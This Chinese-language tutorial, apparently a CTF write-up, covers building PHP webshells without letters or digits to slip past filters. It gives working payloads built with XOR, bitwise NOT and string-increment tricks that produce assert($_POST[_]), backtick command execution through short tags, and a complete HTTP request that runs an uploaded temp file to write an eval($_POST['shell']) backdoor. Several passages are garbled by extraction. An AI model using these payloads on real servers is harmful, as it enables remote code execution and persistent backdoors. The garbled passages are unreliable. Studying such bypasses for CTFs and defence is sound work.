无字母数字webshell总结

以下示例：

>>> print("卢".encode("utf8")) b'\xe5\x8d\xa2' <?php $_="卢"; print(~($_{ 
        1})); print(~"\x8d"); // 输出rr 

以上两个输出是相同的原因是因为里面$_{1}就是\x8d，至于为什么对\x8d取反就能得到r，具体原解释起来涉及到取反、补码、十六进制编码等的相关知识，就略过不表了。(建议回去复习计组)

总之我们就需要知道，对于一个汉字进行_{($x{0})或~($x{1})或}($x{2})的操作，可以得到某个ASCII码的字符值

PHP5中，assert()是一个函数，我们可以用 = a s s e r t ; _=assert; =​assert;_()这样的形式来执行代码。但在PHP7中，assert()变成了一个和eval()一样的语言结构，不再支持上面那种调用方法。(不过貌似这点存疑，我在PHP7.1中确实不允许再使用这种调用方法了，但是网上有人貌似在PHP7.0.12下还能这样调用，可能是7.1及以上不行??)

PHP5中，是不支持($a)()这种调用方法的，但在PHP7中支持这种调用方法，因此支持这么写(‘phpinfo’)();

PHP中有两种短标签，<??>和<?=?>。其中，<??>相当于对<?php>的替换。而<?=?>则是相当于<? echo>。例如:

<?= '111'?>

将会输出’111’ 大部分文章说短标签需要在php.ini中设置short_open_tag为on才能开启短标签(默认是开启的，但似乎又默认注释，所以还是等于没开启)。

但实际上在PHP5.4以后，无论short_open_tag是否开启，<?=?>这种写法总是适用的，<??>这种写法则需要short_open_tag开启才行。

PHP中，反引号可以起到命令执行的效果。

<?php
$_=`whoami`;
echo $_;

成功执行命令

如果我们利用上面短标签的写法，可以把代码简写为:

<?= `whoami`?>

基本所有的思路都是利用无字符构造出相关字符如assert,来进行执行函数。

方法一 方法一就是利用我们上面提到的关于异或的知识, 我给出一个POC:

<?php
$shell = "assert";
$result1 = "";
$result2 = "";
for($num=0;$num<=strlen($shell);$num++)
{ 
        
    for($x=33;$x<=126;$x++)
    { 
        
        if(judge(chr($x)))
        { 
        
            for($y=33;$y<=126;$y++)
            { 
        
                if(judge(chr($y)))
                { 
        
                    $f = chr($x)^chr($y);
                    if($f == $shell[$num])
                    { 
        
                        $result1 .= chr($x);
                        $result2 .= chr($y);
                        break 2;
                    }
                }
            }
        }
    }
}
echo $result1;
echo "<br>";
echo $result2;

function judge($c)
{ 
        
    if(!preg_match('/[a-z0-9]/is',$c))
    { 
        
        return true;
    }
    return false;
}

这个POC可以将"assert"变成两个字符串异或的结果。

为了便于表示，生成字符串的范围我均控制为可见字符(即ASCII为33_{126)，如果要使POC适用范围更广，可以改为0}126，只不过对于不可见字符，需要用url编码表示。

使用这个POC，我们可以得到:

<

?php
$_ = "!((%)("^"@[[@[\\";   //构造出assert
$__ = "!+/(("^"~{`{|";   //构造出_POST
$___ = $$__;   //$___ = $_POST
$_($___[_]);   //assert($_POST[_]);

代入此题的环境，可以看到，成功执行命令

需要注意的是，由于我们的Payload中含有一些特殊字符，我们我们需要对Payload进行一次URL编码。

方法二

方法二就是利用取反的原理，对汉字取反获得字符。

我给出一个POC,从3000+个汉字中获得通过取反得到assert。

在上面的学习过程中，可以知道:

$_="卢";
print(~($_{ 
        1}));
print(~"\x8d");

这两种写法其实是等价的。

所以如果把EXP中的_{(“欠”{1})写成}"\x8d"这种形式，可以缩减不少字符。给出POC:

def get(shell):
    hexbit=''.join(map(lambda x: hex(~(-(256-ord(x)))),shell))
    hexbit = hexbit.replace('0x','%')
    print(hexbit)

get('assert')
get('_POST')

利用这个POC，我把上面的EXP缩减为:

<?php
$_ = ~"%9e%8c%8c%9a%8d%8b";   //得到assert，此时$_="assert"
$__ = ~"%a0%af%b0%ac%ab";   //得到_POST，此时$__="_POST"
$___ = $$__;   //$___=$_POST
$_($___[_]);   //assert($_POST[_])

注意到这里"assert"和"_POST"都用的URL编码表示，如果直接以\x9e\x8c\x8c\x9a\x8d\x8b这种UTF-8字符表示，并不能识别出为UTF-8字符，而是会被识别为英文+数字的字符串。

方法三

这种方法主要就是利用自增自减。

"A"++ ==> "B"
"B"++ ==> "C"

也就是说，如果我们能够得到"A"，那么我们就能通过自增自减，得到所有的字母。

那么问题就转化为怎么得到一个字符"A"。

在PHP中，如果强制连接数组和字符串的话，数组将被转换成字符串，其值为"Array"。再取这个字符串的第一个字母，就可以获得"A"。

<?php
$a = ''.[];
var_dump($a);

故有payload:

<?php
$_=[].'';   //得到"Array"
$___ = $_[$__];   //得到"A"，$__没有定义，默认为False也即0，此时$___="A"
$__ = $___;   //$__="A"
$_ = $___;   //$_="A"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;   //得到"S"，此时$__="S"
$___ .= $__;   //$___="AS"
$___ .= $__;   //$___="ASS"
$__ = $_;   //$__="A"
$__++;$__++;$__++;$__++;   //得到"E"，此时$__="E"
$___ .= $__;   //$___="ASSE"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__;$__++;   //得到"R"，此时$__="R"
$___ .= $__;   //$___="ASSER"
$__++;$__++;   //得到"T"，此时$__="T"
$___ .= $__;   //$___="ASSERT"
$__ = $_;   //$__="A"
$____ = "_";   //$____="_"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;   //得到"P"，此时$__="P"
$____ .= $__;   //$____="_P"
$__ = $_;   //$__="A"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;   //得到"O"，此时$__="O"
$____ .= $__;   //$____="_PO"
$__++;$__++;$__++;$__++;   //得到"S"，此时$__="S"
$____ .= $__;   //$____="_POS"
$__++;   //得到"T"，此时$__="T"
$____ .= $__;   //$____="_POST"
$_ = $$____;   //$_=$_POST
$___($_[_]);   //ASSERT($POST[_])

由于PHP中函数对大小写不敏感，所以我们最终执行的是ASSERT()而不是assert()

在我们上面的例子中，_的主要用途就是在构造变量。

但其实最简便的方法里面，我们可以完全不用_，这里给出一个例子。

?><?=`{ 
        ${ 
        ~"%a0%b8%ba%ab"}[%a0]}`?>

分析下这个Payload，?>闭合了eval自带的<?标签。接下来使用了短标签。

{}包含的PHP代码可以被执行，~“%a0%b8%ba%ab"为”_GET"，通过反引号进行shell命令执行。

最后我们只要GET传参%a0即可执行命令。

过滤了; 分号我们只是用在结束PHP语句上，我们只要把所有的PHP语句改成短标签形式，就可以不使用;了。

**过滤了 ∗ ∗ 过 滤 了 ** 过滤了 ∗∗过滤了的影响是我们彻底不能构造变量了。

PHP7 在PHP7中，我们可以使用($a)()这种方法来执行命令。

这里我使用call_user_func()来举例(不使用assert()的原因上面已经解释过)。

我构造了shell=(_{%9c%9e%93%93%a0%8a%8c%9a%8d%a0%99%8a%91%9c)(}%8c%86%8c%8b%9a%92,~%88%97%90%9e%92%96,‘’); 其中_{%9c%9e%93%93%a0%8a%8c%9a%8d%a0%99%8a%91%9c是"call_user_func"，}%8c%86%8c%8b%9a%92是"system"，~%88%97%90%9e%92%96是"whoami"。 成功执行命令

PHP5 PHP5中不再支持($a)()这种方法来调用函数。因此利用方法较为复杂。 详细过程可以参考P神的无字母数字webshell之提高篇

我们首先要知道几个知识点:

1. Linux下可以用 . 来执行文件

2. PHP中POST上传文件会把我们上传的文件暂时存在/tmp文件夹中，默认文件名是/tmp/phpXXXXXX，文件名最后6个字符是随机的大小写字母。(说句题外话，这个知识点在最近的CTF中频繁出镜，具体利用有如文件包含等)

假如我们要执行生成的文件，那我们可以尝试下

. /???/??? 但是我们会发现这样(通常情况下)并不能争取的执行文件，而是会报错，原因就是这样匹配到的文件太多了，系统不知道要执行哪个文件。

根据P神的文章，最后我们可以采用的Payload是:

. /???/????????[@-[]

最后的[@-[]表示ASCII在@和[之间的字符，也就是大写字母，所以最后会执行的文件是tmp文件夹下结尾是大写字母的文件。

由于PHP生成的tmp文件最后一位是随机的大小写字母，所以我们可能需要多试几次才能正确的执行我们的代码。(50%的几率嘛)

固有最终数据包:

POST /?code=?><?=`.+/%3f%3f%3f/%3f%3f%3f%3f%3f%3f%3f%3f[%40-[]`%3b?> HTTP/1.1
Host: xxxxxx:2333
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Content-Type:multipart/form-data;boundary=--------123 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Length: 106 ----------123 Content-Disposition:form-data;name="file";filename="1.txt" echo "<?php eval(\$_POST['shell']);" > success.php ----------123-- 

上面我们写入了一个shell。如图，成功Getshell。

题目一